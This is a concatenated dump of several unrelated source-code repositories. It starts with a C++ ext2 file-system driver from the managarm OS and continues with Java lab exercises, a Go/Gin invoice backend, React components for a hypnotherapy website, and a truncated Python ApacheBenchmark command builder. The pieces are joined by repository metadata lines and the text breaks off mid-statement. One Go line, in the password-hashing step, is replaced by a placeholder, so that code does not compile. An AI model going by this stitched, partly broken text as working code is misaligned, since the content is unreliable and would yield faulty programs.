constexpr auto fileOperations = protocols::fs::FileOperations{}
	.withSeekAbs(&seekAbs)
	.withSeekRel(&seekRel)
	.withRead(&read)
	.withWrite(&write)
	.withReadEntries(&readEntries)
	.withAccessMemory(&accessMemory);
// Looks up |name| in this directory inode. Returns the target inode, its
// inode number and its file type, or a null result when the entry does not
// exist.
COFIBER_ROUTINE(async::result<protocols::fs::GetLinkResult>, getLink(std::shared_ptr<void> object,
		std::string name), ([=] {
	auto self = std::static_pointer_cast<ext2fs::Inode>(object);
	auto entry = COFIBER_AWAIT self->findEntry(name);
	if(!entry)
		COFIBER_RETURN((protocols::fs::GetLinkResult{nullptr, -1,
				protocols::fs::FileType::unknown}));
	// Translate the on-disk file type into the protocol-level enum.
	// NOTE(review): this switch is duplicated in link() below; a shared
	// helper would avoid the repetition.
	protocols::fs::FileType type;
	switch(entry->fileType) {
	case kTypeDirectory:
		type = protocols::fs::FileType::directory;
		break;
	case kTypeRegular:
		type = protocols::fs::FileType::regular;
		break;
	case kTypeSymlink:
		type = protocols::fs::FileType::symlink;
		break;
	default:
		throw std::runtime_error("Unexpected file type");
	}
	assert(entry->inode);
	COFIBER_RETURN((protocols::fs::GetLinkResult{fs->accessInode(entry->inode), entry->inode, type}));
}))
// Creates a new directory entry |name| pointing at existing inode |ino|.
// Returns the resulting link, or a null result on failure.
COFIBER_ROUTINE(async::result<protocols::fs::GetLinkResult>, link(std::shared_ptr<void> object,
		std::string name, int64_t ino), ([=] {
	auto self = std::static_pointer_cast<ext2fs::Inode>(object);
	auto entry = COFIBER_AWAIT self->link(std::move(name), ino);
	if(!entry)
		COFIBER_RETURN((protocols::fs::GetLinkResult{nullptr, -1,
				protocols::fs::FileType::unknown}));
	protocols::fs::FileType type;
	switch(entry->fileType) {
	case kTypeDirectory:
		type = protocols::fs::FileType::directory;
		break;
	case kTypeRegular:
		type = protocols::fs::FileType::regular;
		break;
	case kTypeSymlink:
		type = protocols::fs::FileType::symlink;
		break;
	default:
		throw std::runtime_error("Unexpected file type");
	}
	assert(entry->inode);
	COFIBER_RETURN((protocols::fs::GetLinkResult{fs->accessInode(entry->inode), entry->inode, type}));
}))
// Removes the directory entry |name| from this directory inode.
COFIBER_ROUTINE(async::result<void>, unlink(std::shared_ptr<void> object,
		std::string name), ([=] {
	auto self = std::static_pointer_cast<ext2fs::Inode>(object);
	COFIBER_AWAIT self->unlink(std::move(name));
}))
// Serves one open file on two lanes: a control lane for file operations and
// a passthrough lane. The passthrough lane is cancelled once the control
// lane shuts down.
COFIBER_ROUTINE(cofiber::no_future, serve(smarter::shared_ptr<ext2fs::OpenFile> file,
		helix::UniqueLane local_ctrl_, helix::UniqueLane local_pt_),
		([file, local_ctrl = std::move(local_ctrl_), local_pt = std::move(local_pt_)] () mutable {
	async::cancellation_event cancel_pt;
	// Cancel the passthrough lane once the file line is closed.
	async::detach(protocols::fs::serveFile(std::move(local_ctrl),
			file.get(), &fileOperations), [&] {
		cancel_pt.cancel();
	});
	COFIBER_AWAIT protocols::fs::servePassthrough(std::move(local_pt),
			file, &fileOperations, cancel_pt);
}))
// Collects stat()-style metadata for an inode once its on-disk data is loaded.
COFIBER_ROUTINE(async::result<protocols::fs::FileStats>,
		getStats(std::shared_ptr<void> object), ([=] {
	auto self = std::static_pointer_cast<ext2fs::Inode>(object);
	COFIBER_AWAIT self->readyJump.async_wait();
	protocols::fs::FileStats stats;
	stats.linkCount = self->numLinks;
	stats.fileSize = self->fileSize();
	stats.mode = self->mode;
	stats.uid = self->uid;
	stats.gid = self->gid;
	stats.accessTime = self->accessTime;
	stats.dataModifyTime = self->dataModifyTime;
	stats.anyChangeTime = self->anyChangeTime;
	COFIBER_RETURN(stats);
}))
// Opens an inode: creates an OpenFile, spawns a server for it (see serve())
// and returns the remote ends of its control and passthrough lanes.
COFIBER_ROUTINE(async::result<protocols::fs::OpenResult>,
		open(std::shared_ptr<void> object), ([=] {
	auto self = std::static_pointer_cast<ext2fs::Inode>(object);
	auto file = smarter::make_shared<ext2fs::OpenFile>(self);
	helix::UniqueLane local_ctrl, remote_ctrl;
	helix::UniqueLane local_pt, remote_pt;
	std::tie(local_ctrl, remote_ctrl) = helix::createStream();
	std::tie(local_pt, remote_pt) = helix::createStream();
	serve(file, std::move(local_ctrl), std::move(local_pt));
	COFIBER_RETURN(protocols::fs::OpenResult(std::move(remote_ctrl), std::move(remote_pt)));
}))
// Reads a symlink target. Only short symlinks whose target is stored inline
// in the inode (<= 60 bytes) are supported; longer targets assert.
COFIBER_ROUTINE(async::result<std::string>, readSymlink(std::shared_ptr<void> object), ([=] {
	auto self = std::static_pointer_cast<ext2fs::Inode>(object);
	COFIBER_AWAIT self->readyJump.async_wait();
	assert(self->fileSize() <= 60);
	std::string link(self->fileData.embedded, self->fileData.embedded + self->fileSize());
	COFIBER_RETURN(link);
}))
// Operation table installed for every inode served by this driver.
constexpr protocols::fs::NodeOperations nodeOperations{
	&getStats,
	&getLink,
	&link,
	&unlink,
	&open,
	&readSymlink
};
} // anonymous namespace
// A block device with the given sector size; subclasses provide the actual I/O.
BlockDevice::BlockDevice(size_t sector_size)
: sectorSize(sector_size) { }
// Accepts and dispatches requests on a partition's mbus lane.
// Supported requests: DEV_MOUNT (hand out the root inode) and
// SB_CREATE_REGULAR (allocate a fresh regular-file inode).
COFIBER_ROUTINE(cofiber::no_future, servePartition(helix::UniqueLane p),
		([lane = std::move(p)] {
	std::cout << "unix device: Connection" << std::endl;
	while(true) {
		// Accept one conversation and read the request message.
		helix::Accept accept;
		helix::RecvInline recv_req;
		auto &&header = helix::submitAsync(lane, helix::Dispatcher::global(),
				helix::action(&accept, kHelItemAncillary),
				helix::action(&recv_req));
		COFIBER_AWAIT header.async_wait();
		HEL_CHECK(accept.error());
		HEL_CHECK(recv_req.error());
		auto conversation = accept.descriptor();
		managarm::fs::CntRequest req;
		req.ParseFromArray(recv_req.data(), recv_req.length());
		if(req.req_type() == managarm::fs::CntReqType::DEV_MOUNT) {
			// Serve the file system's root inode on a fresh lane and push
			// the remote end back to the client.
			helix::SendBuffer send_resp;
			helix::PushDescriptor push_node;
			helix::UniqueLane local_lane, remote_lane;
			std::tie(local_lane, remote_lane) = helix::createStream();
			protocols::fs::serveNode(std::move(local_lane), fs->accessRoot(),
					&nodeOperations);
			managarm::fs::SvrResponse resp;
			resp.set_error(managarm::fs::Errors::SUCCESS);
			auto ser = resp.SerializeAsString();
			auto &&transmit = helix::submitAsync(conversation, helix::Dispatcher::global(),
					helix::action(&send_resp, ser.data(), ser.size(), kHelItemChain),
					helix::action(&push_node, remote_lane));
			COFIBER_AWAIT transmit.async_wait();
			HEL_CHECK(send_resp.error());
			HEL_CHECK(push_node.error());
		}else if(req.req_type() == managarm::fs::CntReqType::SB_CREATE_REGULAR) {
			// Allocate a new regular-file inode and serve it like above.
			helix::SendBuffer send_resp;
			helix::PushDescriptor push_node;
			auto inode = COFIBER_AWAIT fs->createRegular();
			helix::UniqueLane local_lane, remote_lane;
			std::tie(local_lane, remote_lane) = helix::createStream();
			protocols::fs::serveNode(std::move(local_lane),
					inode, &nodeOperations);
			managarm::fs::SvrResponse resp;
			resp.set_error(managarm::fs::Errors::SUCCESS);
			resp.set_id(inode->number);
			resp.set_file_type(managarm::fs::FileType::REGULAR);
			auto ser = resp.SerializeAsString();
			auto &&transmit = helix::submitAsync(conversation, helix::Dispatcher::global(),
					helix::action(&send_resp, ser.data(), ser.size(), kHelItemChain),
					helix::action(&push_node, remote_lane));
			COFIBER_AWAIT transmit.async_wait();
			HEL_CHECK(send_resp.error());
			HEL_CHECK(push_node.error());
		}else{
			throw std::runtime_error("Unexpected request type");
		}
	}
}))
// Drives one block device: parses its GPT, mounts an ext2 file system from
// the first "Windows data"-typed partition and registers it on the mbus.
COFIBER_ROUTINE(cofiber::no_future, runDevice(BlockDevice *device), ([=] {
	table = new gpt::Table(device);
	COFIBER_AWAIT table->parse();
	for(size_t i = 0; i < table->numPartitions(); ++i) {
		auto type = table->getPartition(i).type();
		printf("Partition %lu, type: %.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X\n",
				i, type.a, type.b, type.c, type.d[0], type.d[1],
				type.e[0], type.e[1], type.e[2], type.e[3], type.e[4], type.e[5]);
		// Only the basic-data partition type GUID is recognized here.
		if(type != gpt::type_guids::windowsData)
			continue;
		printf("It's a Windows data partition!\n");
		fs = new ext2fs::FileSystem(&table->getPartition(i));
		COFIBER_AWAIT fs->init();
		printf("ext2fs is ready!\n");
		// Create an mbus object for the partition.
		auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();
		mbus::Properties descriptor{
			{"unix.devtype", mbus::StringItem{"block"}},
			{"unix.devname", mbus::StringItem{"sda0"}}
		};
		// Each bind request gets a fresh lane served by servePartition().
		auto handler = mbus::ObjectHandler{}
		.withBind([] () -> async::result<helix::UniqueDescriptor> {
			helix::UniqueLane local_lane, remote_lane;
			std::tie(local_lane, remote_lane) = helix::createStream();
			servePartition(std::move(local_lane));
			async::promise<helix::UniqueDescriptor> promise;
			promise.set_value(std::move(remote_lane));
			return promise.async_get();
		});
		COFIBER_AWAIT root.createObject("partition", descriptor, std::move(handler));
	}
}))
} // namespace blockfs
| 659b155330fe9ca4e93211f774d043f1a7fbe222 | [
"Markdown",
"C++"
] | 25 | C++ | souravbadami/managarm | 96275b1b16593ea6ba75b83edfb5f7b736ce02a7 | 90187562ad132dfe322d17514dbd879689fc0791 |
refs/heads/master | <file_sep>/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package lab3;
import java.util.Scanner;
/**
*
* @author Admin
*/
/**
 * Solves the quadratic equation a*x^2 + b*x + c = 0, degrading gracefully to
 * the linear equation b*x + c = 0 when a == 0, and reports the solution set
 * as a human-readable string.
 */
public class GiaiPTB2
{
    float a,b,c;               // coefficients of a*x^2 + b*x + c = 0
    double delta;              // discriminant b^2 - 4ac (quadratic case only)
    float x1,x2;               // computed roots; valid only when conghiem == true
    boolean conghiem = false;  // "has a root"

    public GiaiPTB2(float a,float b,float c){
        this.a=a;
        this.b=b;
        this.c=c;
    }

    /**
     * Solves the equation and returns a description of the solution set.
     *
     * Bug fix: the original fell through into the quadratic branch even when
     * a == 0, dividing by 2*a == 0 and producing NaN/Infinity "roots" (and it
     * never reported the root of the linear case). The degenerate cases now
     * return immediately.
     *
     * @return a message describing the roots (or the empty/unsolvable cases)
     */
    String Giai(){
        if(a==0) // degenerate: linear equation b*x + c = 0
        {
            if(b==0)
            {
                if(c==0)
                    return "Phương trình vô số nghiệm.";
                else //c!=0
                    return "Phương trình vô nghiệm.";
            }
            // b != 0: unique root x = -c/b
            x1 = x2 = -c/b;
            conghiem = true;
            return "Nghiệm x=" + x1;
        }
        // proper quadratic (a != 0)
        delta = TinhDelta();
        if(delta <0)
            return "Phương trình vô nghiệm.";
        if(delta == 0)
        {
            x1 = x2 = -b/(2*a);
            conghiem = true;
            return "Nghiệm x1=x2=" + x1;
        }
        x1 = (float)((-b + Math.sqrt(delta))/(2*a));
        x2 = (float)((-b - Math.sqrt(delta))/(2*a));
        conghiem = true;
        return "Nghiệm x1=" + x1 + ", x2=" + x2;
    }

    /** @return the discriminant b*b - 4*a*c. */
    double TinhDelta()
    {
        return (b*b - 4*a*c);
    }
}
<file_sep>/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package lab3;
import java.awt.Container;
import java.awt.FlowLayout;
import java.awt.Font;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import javax.swing.JButton;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JOptionPane;
import javax.swing.JPanel;
import javax.swing.JTextField;
/**
*
* @author Administrator
*/
/**
 * A minimal four-function integer calculator window. Two input fields, a
 * read-only result field and one button per operator (+, -, *, /).
 *
 * Fixes over the original: the GUI is now created on the Swing event dispatch
 * thread, and the four near-identical button-construction and
 * parse/validate/report sequences are factored into helpers.
 */
public class Bai6 extends JFrame implements ActionListener{
    static JButton btnAdd,btnSub,btnMul,btnDiv;
    static JTextField tfNum1,tfNum2,tfResult;

    public Bai6(){
        setTitle("Caculator");
        setLayout(null);
        setDefaultCloseOperation(EXIT_ON_CLOSE);
        setResizable(false);
        Container con=getContentPane();

        JLabel lbnum1=new JLabel("First num:");
        lbnum1.setBounds(30, 30, 100, 30);
        con.add(lbnum1);
        tfNum1=new JTextField();
        tfNum1.setBounds(150, 30, 200, 30);
        con.add(tfNum1);

        JLabel lbnum2=new JLabel("Second num:");
        lbnum2.setBounds(30, 90, 100, 30);
        con.add(lbnum2);
        tfNum2=new JTextField();
        tfNum2.setBounds(150, 90, 200, 30);
        con.add(tfNum2);

        JLabel lbResult=new JLabel("Result:");
        lbResult.setBounds(30, 150, 100, 30);
        con.add(lbResult);
        tfResult=new JTextField();
        tfResult.setBounds(150, 150, 200, 30);
        tfResult.setEditable(false);
        con.add(tfResult);

        // One operator button every 70px, all sharing the same font and row.
        int x=60;
        Font font=new Font("Times New Roman",Font.BOLD,20);
        btnAdd = makeOperatorButton("+", font, x, con);
        btnSub = makeOperatorButton("-", font, x+70, con);
        btnMul = makeOperatorButton("*", font, x+140, con);
        btnDiv = makeOperatorButton("/", font, x+210, con);
    }

    /** Builds one operator button at column {@code x} and wires it to this listener. */
    private JButton makeOperatorButton(String label, Font font, int x, Container con){
        JButton button = new JButton(label);
        button.setFont(font);
        button.setBounds(x, 210, 50, 50);
        button.addActionListener(this);
        con.add(button);
        return button;
    }

    public static void main(String[] args) {
        // Swing components must be created and shown on the event dispatch
        // thread, not on the launcher thread.
        javax.swing.SwingUtilities.invokeLater(new Runnable() {
            @Override
            public void run() {
                Bai6 bai6 = new Bai6();
                bai6.setBounds(200, 200, 400, 350);
                bai6.setVisible(true);
            }
        });
    }

    /**
     * Returns true when {@code t} parses as a decimal integer.
     * NOTE: fractional input such as "3.5" is rejected, matching the
     * original validation behavior.
     */
    boolean CheckInputIsNumber(String t){
        try{
            Integer.parseInt(t);
            return true;
        }catch(NumberFormatException e){
            return false;
        }
    }

    /** Clears both inputs, refocuses the first field and shows an error dialog. */
    private void reportError(String message){
        tfNum2.setText("");
        tfNum1.setText("");
        tfNum1.requestFocus();
        JOptionPane.showMessageDialog(this, message, "Lỗi", JOptionPane.ERROR_MESSAGE);
    }

    @Override
    public void actionPerformed(ActionEvent e) {
        // Validate both inputs once, instead of repeating the check per button.
        if(!CheckInputIsNumber(tfNum1.getText())||!CheckInputIsNumber(tfNum2.getText())){
            reportError("Nhập sai giá trị! phải nhập số mới tính được");
            return;
        }
        float a=Integer.parseInt(tfNum1.getText());
        float b=Integer.parseInt(tfNum2.getText());
        float c;
        if(e.getSource()==btnAdd){
            c=a+b;
        }else if(e.getSource()==btnSub){
            c=a-b;
        }else if(e.getSource()==btnMul){
            c=a*b;
        }else if(e.getSource()==btnDiv){
            if(b==0){
                reportError("Số bị chia không được bằng 0 (second num=0). Nhập lại đê bạn ơi!");
                return;
            }
            c=a/b;
        }else{
            return; // event from an unknown source; ignore
        }
        this.tfResult.setText(String.valueOf(c));
    }
}
| f34439aea9c6192ba49324bcd56c5dae5bd0e630 | [
"Java"
] | 2 | Java | Ariztyno/CongCuMoiTruongPhatTrienPhanMem_LAB4 | af4af5466d6b45fe69606d53caf6f95ecce9d850 | c0b8a3c4d7c59f37edc5220c85d21844339a4e27 |
refs/heads/master | <repo_name>cyantarek/go-vue-invoice-app<file_sep>/backend/handlers.go
package main
import (
"fmt"
"github.com/gin-gonic/gin"
"github.com/google/uuid"
"golang.org/x/crypto/bcrypt"
"gopkg.in/mgo.v2/bson"
"log"
"net/http"
)
// Controllers
func Register(c *gin.Context) {
var newUser User
_ = c.Bind(&newUser)
if newUser.Name == "" || newUser.Email == "" || newUser.CompanyName == "" || newUser.Password == "" {
c.JSON(http.StatusBadRequest, gin.H{"msg": "All fields are required"})
return
}
hashedPassword, err := bcrypt.GenerateFromPassword([]byte(newUser.Password), bcrypt.DefaultCost)
if err != nil {
c.JSON(http.StatusInternalServerError, nil)
}
newUser.Password = string(<PASSWORD>)
newUser.ID = bson.NewObjectId()
_ = db.C("users").Insert(&newUser)
c.JSON(200, gin.H{"token": uuid.New(), "user": newUser, "status": true})
}
// Login authenticates a user by email and password and responds with a
// session token and the user record.
func Login(c *gin.Context) {
	payload := struct {
		Email    string `json:"email"`
		Password string `json:"password"`
	}{}
	// Bug fix: the request body was never bound, so Email/Password were
	// always empty and login could never succeed.
	if err := c.BindJSON(&payload); err != nil {
		c.JSON(http.StatusBadRequest, gin.H{"error": "Invalid request body"})
		return
	}
	// Bug fix: reject when *either* field is missing (was &&, which only
	// triggered when both were empty).
	if payload.Email == "" || payload.Password == "" {
		c.JSON(http.StatusBadRequest, gin.H{"error": "All fields are required"})
		return
	}
	var user User
	err := db.C("users").Find(bson.M{"email": payload.Email}).One(&user)
	if err != nil {
		c.JSON(http.StatusInternalServerError, gin.H{"error": "User not found"})
		return
	}
	if err := bcrypt.CompareHashAndPassword([]byte(user.Password), []byte(payload.Password)); err != nil {
		fmt.Println(err.Error())
		c.JSON(http.StatusInternalServerError, gin.H{"error": "Password not match"})
		return
	}
	c.JSON(http.StatusOK, gin.H{"token": uuid.New(), "user": user})
}
// CreateInvoice stores a new invoice for a user together with its line-item
// transactions, then responds with the created invoice.
func CreateInvoice(c *gin.Context) {
	payload := struct {
		Name         string `json:"name"`
		Transactions []struct {
			ID        bson.ObjectId `bson:"_id"`
			Name      string        `json:"name"`
			InvoiceID string        `json:"invoice_id" bson:"invoice_id"`
			Price     int           `json:"price"`
		} `json:"transactions"`
		UserID string `json:"user_id"`
	}{}
	if err := c.BindJSON(&payload); err != nil {
		c.JSON(http.StatusBadRequest, gin.H{"msg": "Invalid request body"})
		return
	}
	if payload.Name == "" {
		c.JSON(http.StatusBadRequest, gin.H{"msg": "All fields are required"})
		return
	}
	var invoice Invoice
	invoice.ID = bson.NewObjectId()
	invoice.Name = payload.Name
	invoice.UserID = payload.UserID
	// Bug fix: insert errors were silently discarded.
	if err := db.C("invoices").Insert(&invoice); err != nil {
		c.JSON(http.StatusInternalServerError, gin.H{"msg": "Could not create invoice"})
		return
	}
	// Link each transaction to the freshly created invoice.
	for i := range payload.Transactions {
		t := payload.Transactions[i]
		t.ID = bson.NewObjectId()
		t.InvoiceID = invoice.ID.Hex()
		if err := db.C("transactions").Insert(&t); err != nil {
			c.JSON(http.StatusInternalServerError, gin.H{"msg": "Could not create transactions"})
			return
		}
	}
	// Bug fix: the original never wrote a response on success.
	c.JSON(http.StatusOK, gin.H{"status": true, "invoice": invoice})
}
// GetAllInvoiceOfAUser lists every invoice belonging to the user in the
// :userId path parameter.
func GetAllInvoiceOfAUser(c *gin.Context) {
	var invoices []Invoice
	err := db.C("invoices").Find(bson.M{"user_id": bson.M{"$eq": c.Param("userId")}}).All(&invoices)
	if err != nil {
		// Bug fix: the original logged the error but still answered 200.
		log.Println(err)
		c.JSON(http.StatusInternalServerError, gin.H{"status": false, "error": "Could not load invoices"})
		return
	}
	c.JSON(200, gin.H{"status": true, "user_id": c.Param("userId"), "invoices": invoices})
}
// GetOneInvoiceOfAUser returns a single invoice (matched by both user and
// invoice id) together with its transactions and payment state.
func GetOneInvoiceOfAUser(c *gin.Context) {
	// Bug fix: bson.ObjectIdHex panics on malformed input; validate first.
	if !bson.IsObjectIdHex(c.Param("invoiceId")) {
		c.JSON(http.StatusBadRequest, gin.H{"status": false, "error": "Invalid invoice id"})
		return
	}
	var invoice Invoice
	andQuery := bson.M{"$and": []bson.M{{"user_id": c.Param("userId")}, {"_id": bson.ObjectIdHex(c.Param("invoiceId"))}}}
	if err := db.C("invoices").Find(andQuery).One(&invoice); err != nil {
		// Bug fix: the original logged errors but still answered 200 with
		// zero-valued data.
		log.Println(err)
		c.JSON(http.StatusNotFound, gin.H{"status": false, "error": "Invoice not found"})
		return
	}
	var transactions []Transaction
	if err := db.C("transactions").Find(bson.M{"invoice_id": bson.M{"$eq": invoice.ID.Hex()}}).All(&transactions); err != nil {
		log.Println(err)
		c.JSON(http.StatusInternalServerError, gin.H{"status": false, "error": "Could not load transactions"})
		return
	}
	c.JSON(200, gin.H{"status": true, "invoice_id": invoice.ID, "user_id": c.Param("userId"), "transactions": transactions, "paid": invoice.Paid})
}
<file_sep>/README.md
# Go Vue Invoice App
<file_sep>/backend/models.go
package main
import (
"gopkg.in/mgo.v2/bson"
)
// Models
// User is a registered account. Password is excluded from JSON output
// via the `json:"-"` tag (it is still persisted in Mongo).
type User struct {
	ID          bson.ObjectId `json:"id" bson:"_id"`
	Name        string        `json:"name"`
	Email       string        `json:"email"`
	CompanyName string        `json:"company_name" bson:"company_name"`
	Password    string        `json:"-"`
}

// Invoice groups a set of transactions under a single user.
type Invoice struct {
	ID     bson.ObjectId `json:"id" bson:"_id"`
	Name   string        `json:"name"`
	Paid   bool          `json:"paid"`
	UserID string        `json:"user_id" bson:"user_id"`
}

// Transaction is one line item belonging to an invoice; InvoiceID holds
// the hex form of the parent invoice's ObjectId.
type Transaction struct {
	ID        bson.ObjectId `json:"id" bson:"_id"`
	Name      string        `json:"name"`
	Price     float32       `json:"price"`
	InvoiceID string        `json:"invoice_id" bson:"invoice_id"`
}
<file_sep>/backend/main.go
package main
import (
"github.com/gin-contrib/cors"
"github.com/gin-gonic/gin"
"gopkg.in/mgo.v2"
"log"
)
var db *mgo.Database
// main wires up the HTTP server: permissive CORS (the Vue frontend is
// served elsewhere), the MongoDB connection and all routes, then listens
// on :3128.
func main() {
	app := gin.Default()
	app.Use(cors.New(cors.Config{
		AllowMethods:     []string{"GET", "POST", "OPTIONS", "PUT"},
		AllowHeaders:     []string{"Origin", "Content-Length", "Content-Type", "User-Agent", "Referrer", "Host", "Token"},
		ExposeHeaders:    []string{"Content-Length"},
		AllowCredentials: true,
		AllowAllOrigins:  true,
		MaxAge:           86400,
	}))
	session, err := mgo.Dial("mongodb://localhost")
	if err != nil {
		log.Fatal(err)
	}
	// Release the Mongo session when the server exits (was never closed).
	defer session.Close()
	db = session.DB("invoice")
	app.GET("/", func(c *gin.Context) {
		c.String(200, "Welcome to Invoicing App")
	})
	app.POST("/register", Register)
	app.POST("/login", Login)
	app.POST("/invoices", CreateInvoice)
	app.GET("/invoices/user/:userId", GetAllInvoiceOfAUser)
	app.GET("/invoices/user/:userId/:invoiceId", GetOneInvoiceOfAUser)
	// Surface a failed listen instead of discarding the error.
	if err := app.Run(":3128"); err != nil {
		log.Fatal(err)
	}
}
| 30be70d19393beebf1f1eaf481f414d52372699f | [
"Markdown",
"Go"
] | 4 | Go | cyantarek/go-vue-invoice-app | 63d86fcde6d7596edb40c17111fb8349e553439a | d2bf3d770f252bd222ff163cb6efd7d89c333573 |
refs/heads/master | <repo_name>harryjms/hypnotherapy-website<file_sep>/src/Components/App/index.jsx
import React from 'react';
import { ThemeProvider } from 'react-jss';
import theme from '../../Theme/index.js';
import { BrowserRouter as Router, Route, Link, Switch } from 'react-router-dom';
import Header from '../Layout/Header.jsx';
// PAGES
import Error404 from '../../Pages/Errors/404.jsx';
import Home from '../../Pages/Home/index.jsx';
class App extends React.Component {
constructor(props) {
super(props);
}
render() {
return (
<ThemeProvider theme={theme}>
<Router>
<React.Fragment>
<Header />
<Switch>
<Route exact path="/" component={Home} />
<Route component={Error404} />
</Switch>
</React.Fragment>
</Router>
</ThemeProvider>
);
}
}
export default App;
<file_sep>/src/Pages/Errors/404.jsx
import React from "react";
import Content from "../../Components/Layout/Content.jsx";
/**
 * Fallback page rendered for any route the router does not match.
 * The no-op constructor was removed (ESLint no-useless-constructor).
 */
class Error404 extends React.Component {
  render() {
    return <Content>Error 404</Content>;
  }
}
export default Error404;
<file_sep>/src/Components/Icons/menu/index.jsx
import React from 'react';
class IconMenu extends React.Component {
constructor(props) {
super(props);
}
render() {
const { size, color, ...rest } = this.props;
return (
<svg
xmlns="http://www.w3.org/2000/svg"
width={size || 24}
height={size || 24}
viewBox="0 0 24 24"
{...rest}
>
<path d="M0 0h24v24H0z" fill={color || 'none'} />
<path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z" />
</svg>
);
}
}
export default IconMenu;
<file_sep>/src/Components/Layout/Content.jsx
import React from 'react';
import injectSheet from 'react-jss';
import { combineClasses } from '../../Utils/jss.js';
const styles = theme => ({
content: {
maxWidth: 960,
width: '100%',
margin: '0 auto',
},
});
class Content extends React.Component {
constructor(props) {
super(props);
}
render() {
const { classes, className, style } = this.props;
return (
<div className={combineClasses(classes.content, className)} style={style}>
{this.props.children}
</div>
);
}
}
export default injectSheet(styles)(Content);
<file_sep>/src/Components/Layout/Header.jsx
import React from 'react';
import injectSheet from 'react-jss';
import { Link, withRouter } from 'react-router-dom';
import { combineClasses } from '../../Utils/jss';
import IconMenu from '../Icons/menu/index.jsx';
import logo from '../../../assets/images/logo.png';
import Content from './Content.jsx';
// JSS style factory for the header; `theme` is supplied by the
// ThemeProvider configured in App.
const styles = theme => ({
  link: theme.link,
  // Slim contact-details bar shown above the main navigation.
  topBar: {
    padding: 5,
    backgroundColor: theme.colours.accent,
    color: theme.colours.darkPink,
    textAlign: 'right',
  },
  topBarItem: {
    display: 'inline-block',
    marginLeft: 20,
    fontSize: '10pt',
  },
  appBar: {
    padding: '40px 0px',
    display: 'flex',
    alignItems: 'center',
  },
  // Burger icon is hidden on desktop; the media query below reveals it.
  burgerMenu: {
    display: 'none',
    position: 'absolute',
    top: 40,
    left: 10,
    fill: theme.colours.darkPink,
  },
  logo: {
    width: 100,
  },
  logo_img: {
    width: '100%',
  },
  navigation: {
    display: 'flex',
  },
  navItem: {
    ...theme.link,
    flex: 1,
    fontWeight: 'bold',
    marginLeft: 40,
    '&:hover:after': {
      ...theme.link['&:hover:after'],
      borderWidth: 2,
    },
  },
  // Mobile layout: stack the bar vertically; nav visibility is toggled
  // by adding navigationOpen from component state.
  '@media (max-width: 760px)': {
    appBar: {
      flexDirection: 'column',
      justifyContent: 'space-around',
    },
    burgerMenu: {
      display: 'block',
    },
    navigation: {
      flexDirection: 'column',
      textAlign: 'center',
      marginTop: 20,
      width: '100%',
      display: 'none',
    },
    navigationOpen: {
      display: 'flex',
    },
    navItem: {
      marginLeft: 0,
      padding: '10px 0',
      width: '100%',
      '-webkit-tap-highlight-color': 'transparent',
      '&:hover': {
        backgroundColor: theme.colours.accent,
        color: 'white',
      },
      '&:after': {
        display: 'none',
      },
    },
  },
});
// Site header: contact bar, logo and responsive navigation links.
class Header extends React.Component {
  constructor(props) {
    super(props);
    // menuOpen drives the mobile burger-menu visibility.
    this.state = {
      menuOpen: false,
    };
  }
  // NOTE(review): componentWillReceiveProps is deprecated since React
  // 16.3; consider migrating to componentDidUpdate — confirm the
  // project's React version before changing.
  componentWillReceiveProps(nextProps) {
    // Close the mobile menu whenever the route changes.
    if (nextProps.location.pathname !== this.props.location.pathname) {
      this.setState({ menuOpen: false });
    }
  }
  render() {
    const { classes } = this.props;
    return (
      <React.Fragment>
        <div className={classes.topBar}>
          <Content>
            <div className={classes.topBarItem}>T 07909 042010</div>
            <div className={classes.topBarItem}>
              E{' '}
              <a
                href="mailto:<EMAIL>"
                className={classes.link}
              >
                <EMAIL>
              </a>
            </div>
          </Content>
        </div>
        <Content className={classes.appBar}>
          <IconMenu
            className={classes.burgerMenu}
            size={24}
            title="Menu"
            onClick={() =>
              this.setState(prevState => ({ menuOpen: !prevState.menuOpen }))
            }
          />
          <div className={classes.logo}>
            <img src={logo} className={classes.logo_img} />
          </div>
          <div
            className={combineClasses(
              classes.navigation,
              this.state.menuOpen && classes.navigationOpen,
            )}
          >
            <Link to="/" className={classes.navItem}>
              Home
            </Link>
            <Link to="/about" className={classes.navItem}>
              About
            </Link>
            <Link to="/information" className={classes.navItem}>
              Information
            </Link>
            <Link to="/faq" className={classes.navItem}>
              FAQ
            </Link>
            <Link to="/treatments" className={classes.navItem}>
              Treatments
            </Link>
            <Link to="/prices" className={classes.navItem}>
              Prices
            </Link>
          </div>
        </Content>
      </React.Fragment>
    );
  }
}
export default withRouter(injectSheet(styles)(Header));
<file_sep>/src/Theme/index.js
import colours from './colours';
import borders from './borders';
import link from './link';
// Aggregated application theme consumed by react-jss's ThemeProvider.
const appTheme = {
  colours,
  borders,
  link,
};
export default appTheme;
<file_sep>/src/Components/Icons/index.jsx
// Barrel module collecting every icon component under one default export.
import IconMenu from './menu/index.jsx';
export default { IconMenu };
| 7981c3515d0ce73a30ac705c34053efa8c875c55 | [
"JavaScript"
] | 7 | JavaScript | harryjms/hypnotherapy-website | 90dafcd16ec30a13b29b11bd5f802fd8d8f61f7b | 900e005e8d0d6fec05c7d4a01f673bc2b7da645f |
refs/heads/main | <repo_name>Zekylly/ApacheBenchmarkAPITestTool<file_sep>/Common/Exceter.py
# -*- coding: utf-8 -*-
import os
import datetime
import xlrd
# def requests_by_duration(continue_time_seconds,concurrency_threads,info_level=1,headers_type="",header_array=[],api_address="",output_path=""):
# cmd_list=[]
# for threads in concurrency_threads.split("|"):
# cmd_content="ab"+" -t "+str(continue_time_seconds)+" -c " +str(threads)
# cmd_content=cmd_content+" -v "+str(info_level)
# if len(headers_type)>0:
# cmd_content = cmd_content + " -T " + headers_type
# if len(header_array)>0:
# for header in header_array:
# cmd_content=cmd_content+" -H "+str(header)
# cmd_content=cmd_content+" "+str(api_address)
# if len(output_path)>0:
# cmd_content=cmd_content+" > "+os.path.abspath(os.path.dirname(os.path.dirname(__file__)))+"/TestResultFloder/"+\
# datetime.datetime.strftime(datetime.datetime.now(), '%m%d%H%M')+"_"+\
